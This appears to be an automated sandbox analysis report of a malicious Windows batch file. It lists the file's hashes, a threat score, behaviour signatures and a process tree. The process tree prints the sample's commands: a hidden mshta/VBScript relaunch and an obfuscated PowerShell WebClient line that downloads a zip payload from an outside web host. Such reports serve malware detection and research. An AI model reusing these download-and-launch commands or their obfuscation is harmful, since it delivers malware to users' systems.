Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    15/10/2024, 23:37

General

  • Target

    1[1].bat

  • Size

    158KB

  • MD5

    fe40ee4255d4757724cfca0bc65c2384

  • SHA1

    d012699b807eb5b32909ffdc365897ecc2b46c15

  • SHA256

    2f4252bb9695dd309f064d40d3fa45a122e6a44b3c442bff8d1ee1cd0a27c0fc

  • SHA512

    b58e09d1052c5d2e636329bb31337b2addd14971fd2322b382489af238dd536118490f1e4cdd461b68d666a7b0837404014970c6b2245a1f805074b203111dc7

  • SSDEEP

    3072:itkxMyL+YnNk57n2+d1zyPpwIjbrnHM7kZQ0u/swy/W:igJKKNk57fdB4pwIjbKkeGW

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\1[1].bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
        PID:2300
      • C:\Windows\system32\mshta.exe
        mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\1_1_~1.BAT"" ::",0)(window.close)
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2380
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\1_1_~1.BAT" ::"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1644
          • C:\Windows\system32\chcp.com
            chcp 65001
            4⤵
              PID:2724
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.P~37, 1%w%jF,fXtX%k%Qi[NN,$AICSALx_$$%coMMONPRogRAmw6432:~1, 1%J1%dGtLVU%h%jQqkBx%w%ohVlWGB%W1%WWLhu%h%pRJZg%p%tRQR,Bj%s%dLQP?g%S1%XVlPzC%d%])b#j?%w%ipATPi_%k%GoA$sjtXRUWldbsveEsiUdSjdtF])g$%a%zN[h$P::FWfQj3f9.zip') "
              4⤵
                PID:2760
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2764

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/2764-5-0x000000001B680000-0x000000001B962000-memory.dmp

                Filesize

                2.9MB

              • memory/2764-6-0x0000000002240000-0x0000000002248000-memory.dmp

                Filesize

                32KB